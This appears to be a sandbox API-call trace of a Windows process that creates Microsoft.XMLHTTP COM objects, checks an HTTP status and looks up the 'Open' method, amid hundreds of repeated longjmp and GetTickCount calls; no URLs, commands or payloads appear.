	[0192.501] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0192.501] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0192.502] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0192.502] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0192.502] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0192.502] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0192.503] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0192.503] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0192.503] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0192.507] longjmp () 
	[0192.507] longjmp () 
	[0192.507] longjmp () 
	[0192.507] GetCurrentThreadId () returned 0x9a8
	[0192.508] GetCurrentThreadId () returned 0x9a8
	[0192.508] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0192.508] malloc (_Size=0x80) returned 0x3c88b0
	[0192.508] longjmp () 
	[0192.508] longjmp () 
	[0192.508] longjmp () 
	[0192.509] longjmp () 
	[0192.509] longjmp () 
	[0192.509] longjmp () 
	[0192.509] longjmp () 
	[0192.509] longjmp () 
	[0192.510] longjmp () 
	[0192.510] GetTickCount () returned 0x1165b2b
	[0192.510] longjmp () 
	[0192.510] longjmp () 
	[0192.510] longjmp () 
	[0192.511] longjmp () 
	[0192.511] longjmp () 
	[0192.511] longjmp () 
	[0192.511] longjmp () 
	[0192.511] longjmp () 
	[0192.512] longjmp () 
	[0192.512] longjmp () 
	[0192.512] longjmp () 
	[0192.512] longjmp () 
	[0192.513] longjmp () 
	[0192.513] longjmp () 
	[0192.513] longjmp () 
	[0192.514] longjmp () 
	[0192.514] longjmp () 
	[0192.514] longjmp () 
	[0192.514] longjmp () 
	[0192.515] longjmp () 
	[0192.515] longjmp () 
	[0192.515] longjmp () 
	[0192.515] longjmp () 
	[0192.515] longjmp () 
	[0192.516] longjmp () 
	[0192.516] longjmp () 
	[0192.516] longjmp () 
	[0192.516] longjmp () 
	[0192.516] longjmp () 
	[0192.517] longjmp () 
	[0192.517] longjmp () 
	[0192.517] longjmp () 
	[0192.517] GetTickCount () returned 0x1165b2b
	[0192.517] longjmp () 
	[0192.518] longjmp () 
	[0192.518] longjmp () 
	[0192.518] longjmp () 
	[0192.518] longjmp () 
	[0192.518] longjmp () 
	[0192.518] longjmp () 
	[0192.519] longjmp () 
	[0192.519] longjmp () 
	[0192.519] longjmp () 
	[0192.519] longjmp () 
	[0192.519] longjmp () 
	[0192.519] longjmp () 
	[0192.520] longjmp () 
	[0192.520] longjmp () 
	[0192.520] longjmp () 
	[0192.520] longjmp () 
	[0192.520] longjmp () 
	[0192.521] longjmp () 
	[0192.521] longjmp () 
	[0192.521] longjmp () 
	[0192.521] longjmp () 
	[0192.521] longjmp () 
	[0192.521] longjmp () 
	[0192.522] longjmp () 
	[0192.522] longjmp () 
	[0192.522] longjmp () 
	[0192.522] longjmp () 
	[0192.522] longjmp () 
	[0192.522] longjmp () 
	[0192.523] longjmp () 
	[0192.523] longjmp () 
	[0192.523] GetTickCount () returned 0x1165b3b
	[0192.523] longjmp () 
	[0192.523] longjmp () 
	[0192.523] longjmp () 
	[0192.523] longjmp () 
	[0192.524] longjmp () 
	[0192.524] longjmp () 
	[0192.524] longjmp () 
	[0192.524] longjmp () 
	[0192.524] longjmp () 
	[0192.525] longjmp () 
	[0192.525] longjmp () 
	[0192.525] longjmp () 
	[0192.525] longjmp () 
	[0192.525] longjmp () 
	[0192.526] longjmp () 
	[0192.526] longjmp () 
	[0192.526] longjmp () 
	[0192.526] longjmp () 
	[0192.526] longjmp () 
	[0192.526] longjmp () 
	[0192.527] longjmp () 
	[0192.527] longjmp () 
	[0192.527] longjmp () 
	[0192.527] longjmp () 
	[0192.527] longjmp () 
	[0192.528] longjmp () 
	[0192.528] longjmp () 
	[0192.528] longjmp () 
	[0192.528] longjmp () 
	[0192.529] longjmp () 
	[0192.529] longjmp () 
	[0192.529] longjmp () 
	[0192.529] GetTickCount () returned 0x1165b3b
	[0192.529] longjmp () 
	[0192.529] longjmp () 
	[0192.530] longjmp () 
	[0192.530] longjmp () 
	[0192.530] longjmp () 
	[0192.530] longjmp () 
	[0192.530] longjmp () 
	[0192.530] longjmp () 
	[0192.531] longjmp () 
	[0192.531] longjmp () 
	[0192.531] longjmp () 
	[0192.531] longjmp () 
	[0192.531] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.532] longjmp () 
	[0192.533] longjmp () 
	[0192.533] longjmp () 
	[0192.533] longjmp () 
	[0192.533] longjmp () 
	[0192.533] longjmp () 
	[0192.533] longjmp () 
	[0192.534] longjmp () 
	[0192.534] longjmp () 
	[0192.534] longjmp () 
	[0192.534] longjmp () 
	[0192.534] longjmp () 
	[0192.534] longjmp () 
	[0192.535] GetTickCount () returned 0x1165b3b
	[0192.535] longjmp () 
	[0192.535] longjmp () 
	[0192.535] longjmp () 
	[0192.535] longjmp () 
	[0192.536] longjmp () 
	[0192.536] longjmp () 
	[0192.536] longjmp () 
	[0192.536] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.537] longjmp () 
	[0192.538] longjmp () 
	[0192.538] longjmp () 
	[0192.538] longjmp () 
	[0192.538] longjmp () 
	[0192.538] longjmp () 
	[0192.538] longjmp () 
	[0192.539] longjmp () 
	[0192.539] longjmp () 
	[0192.539] longjmp () 
	[0192.539] longjmp () 
	[0192.539] longjmp () 
	[0192.539] longjmp () 
	[0192.540] longjmp () 
	[0192.540] longjmp () 
	[0192.540] longjmp () 
	[0192.540] longjmp () 
	[0192.540] longjmp () 
	[0192.540] GetTickCount () returned 0x1165b4a
	[0192.540] longjmp () 
	[0192.541] longjmp () 
	[0192.541] longjmp () 
	[0192.541] longjmp () 
	[0192.541] longjmp () 
	[0192.541] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.542] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.543] longjmp () 
	[0192.544] longjmp () 
	[0192.544] longjmp () 
	[0192.544] longjmp () 
	[0192.544] longjmp () 
	[0192.544] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.545] longjmp () 
	[0192.546] GetTickCount () returned 0x1165b4a
	[0192.546] longjmp () 
	[0192.546] longjmp () 
	[0192.546] longjmp () 
	[0192.546] longjmp () 
	[0192.546] longjmp () 
	[0192.546] longjmp () 
	[0192.547] longjmp () 
	[0192.547] longjmp () 
	[0192.547] longjmp () 
	[0192.547] longjmp () 
	[0192.547] longjmp () 
	[0192.547] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.548] longjmp () 
	[0192.549] longjmp () 
	[0192.549] longjmp () 
	[0192.549] longjmp () 
	[0192.549] longjmp () 
	[0192.549] longjmp () 
	[0192.549] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.550] longjmp () 
	[0192.551] GetTickCount () returned 0x1165b4a
	[0192.551] longjmp () 
	[0192.551] longjmp () 
	[0192.551] longjmp () 
	[0192.551] longjmp () 
	[0192.551] longjmp () 
	[0192.566] longjmp () 
	[0192.566] longjmp () 
	[0192.566] longjmp () 
	[0192.567] longjmp () 
	[0192.567] longjmp () 
	[0192.567] longjmp () 
	[0192.567] longjmp () 
	[0192.567] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.568] longjmp () 
	[0192.569] longjmp () 
	[0192.569] longjmp () 
	[0192.569] longjmp () 
	[0192.569] longjmp () 
	[0192.569] longjmp () 
	[0192.569] longjmp () 
	[0192.570] longjmp () 
	[0192.570] longjmp () 
	[0192.570] longjmp () 
	[0192.570] longjmp () 
	[0192.570] longjmp () 
	[0192.570] longjmp () 
	[0192.571] GetTickCount () returned 0x1165b69
	[0192.571] longjmp () 
	[0192.571] longjmp () 
	[0192.571] longjmp () 
	[0192.571] longjmp () 
	[0192.571] longjmp () 
	[0192.571] longjmp () 
	[0192.572] longjmp () 
	[0192.572] longjmp () 
	[0192.572] longjmp () 
	[0192.572] longjmp () 
	[0192.572] longjmp () 
	[0192.573] longjmp () 
	[0192.573] longjmp () 
	[0192.573] longjmp () 
	[0192.573] longjmp () 
	[0192.573] longjmp () 
	[0192.574] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.575] longjmp () 
	[0192.576] longjmp () 
	[0192.576] longjmp () 
	[0192.576] longjmp () 
	[0192.576] longjmp () 
	[0192.577] longjmp () 
	[0192.577] longjmp () 
	[0192.578] longjmp () 
	[0192.578] longjmp () 
	[0192.579] GetTickCount () returned 0x1165b69
	[0192.579] longjmp () 
	[0192.579] longjmp () 
	[0192.579] longjmp () 
	[0192.579] longjmp () 
	[0192.579] longjmp () 
	[0192.579] longjmp () 
	[0192.580] longjmp () 
	[0192.580] longjmp () 
	[0192.580] longjmp () 
	[0192.580] longjmp () 
	[0192.580] longjmp () 
	[0192.580] longjmp () 
	[0192.581] longjmp () 
	[0192.581] longjmp () 
	[0192.581] longjmp () 
	[0192.581] longjmp () 
	[0192.581] longjmp () 
	[0192.582] longjmp () 
	[0192.582] longjmp () 
	[0192.582] longjmp () 
	[0192.582] longjmp () 
	[0192.582] longjmp () 
	[0192.582] longjmp () 
	[0192.583] longjmp () 
	[0192.583] longjmp () 
	[0192.583] longjmp () 
	[0192.583] longjmp () 
	[0192.583] longjmp () 
	[0192.584] longjmp () 
	[0192.584] longjmp () 
	[0192.584] longjmp () 
	[0192.584] longjmp () 
	[0192.584] GetTickCount () returned 0x1165b79
	[0192.584] longjmp () 
	[0192.584] longjmp () 
	[0192.584] longjmp () 
	[0192.585] longjmp () 
	[0192.585] longjmp () 
	[0192.585] longjmp () 
	[0192.585] longjmp () 
	[0192.585] longjmp () 
	[0192.585] longjmp () 
	[0192.586] longjmp () 
	[0192.586] longjmp () 
	[0192.586] longjmp () 
	[0192.586] longjmp () 
	[0192.586] longjmp () 
	[0192.586] longjmp () 
	[0192.587] longjmp () 
	[0192.587] longjmp () 
	[0192.587] longjmp () 
	[0192.587] longjmp () 
	[0192.587] longjmp () 
	[0192.587] longjmp () 
	[0192.588] longjmp () 
	[0192.588] longjmp () 
	[0192.588] longjmp () 
	[0192.588] longjmp () 
	[0192.588] longjmp () 
	[0192.588] longjmp () 
	[0192.589] longjmp () 
	[0192.589] longjmp () 
	[0192.589] longjmp () 
	[0192.589] longjmp () 
	[0192.589] longjmp () 
	[0192.589] GetTickCount () returned 0x1165b79
	[0192.589] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.590] longjmp () 
	[0192.591] longjmp () 
	[0192.591] longjmp () 
	[0192.591] longjmp () 
	[0192.591] longjmp () 
	[0192.591] longjmp () 
	[0192.591] longjmp () 
	[0192.592] longjmp () 
	[0192.592] longjmp () 
	[0192.592] longjmp () 
	[0192.592] longjmp () 
	[0192.592] longjmp () 
	[0192.592] longjmp () 
	[0192.593] longjmp () 
	[0192.593] longjmp () 
	[0192.593] longjmp () 
	[0192.593] longjmp () 
	[0192.593] longjmp () 
	[0192.593] longjmp () 
	[0192.594] longjmp () 
	[0192.594] longjmp () 
	[0192.594] longjmp () 
	[0192.594] longjmp () 
	[0192.594] longjmp () 
	[0192.595] longjmp () 
	[0192.595] GetTickCount () returned 0x1165b79
	[0192.595] longjmp () 
	[0192.595] longjmp () 
	[0192.595] longjmp () 
	[0192.595] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.596] longjmp () 
	[0192.597] longjmp () 
	[0192.597] longjmp () 
	[0192.597] longjmp () 
	[0192.597] longjmp () 
	[0192.597] longjmp () 
	[0192.597] longjmp () 
	[0192.598] longjmp () 
	[0192.598] longjmp () 
	[0192.598] longjmp () 
	[0192.598] longjmp () 
	[0192.598] longjmp () 
	[0192.598] longjmp () 
	[0192.599] longjmp () 
	[0192.599] longjmp () 
	[0192.599] longjmp () 
	[0192.599] longjmp () 
	[0192.599] longjmp () 
	[0192.600] longjmp () 
	[0192.600] longjmp () 
	[0192.600] longjmp () 
	[0192.600] longjmp () 
	[0192.601] GetTickCount () returned 0x1165b89
	[0192.601] longjmp () 
	[0192.601] longjmp () 
	[0192.601] longjmp () 
	[0192.601] longjmp () 
	[0192.603] longjmp () 
	[0192.604] longjmp () 
	[0192.604] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0192.604] SysStringLen (param_1=0x0) returned 0x0
	[0192.604] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0192.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0192.604] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0192.604] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0192.604] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0192.605] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0192.605] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0192.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0192.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0192.605] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0192.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0192.605] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0192.605] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0192.605] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0192.605] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0192.605] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0192.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0192.606] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0192.606] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0192.606] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0192.606] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.606] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0192.606] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0192.607] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0192.607] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0192.607] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0192.607] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0192.607] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0192.607] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0192.610] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
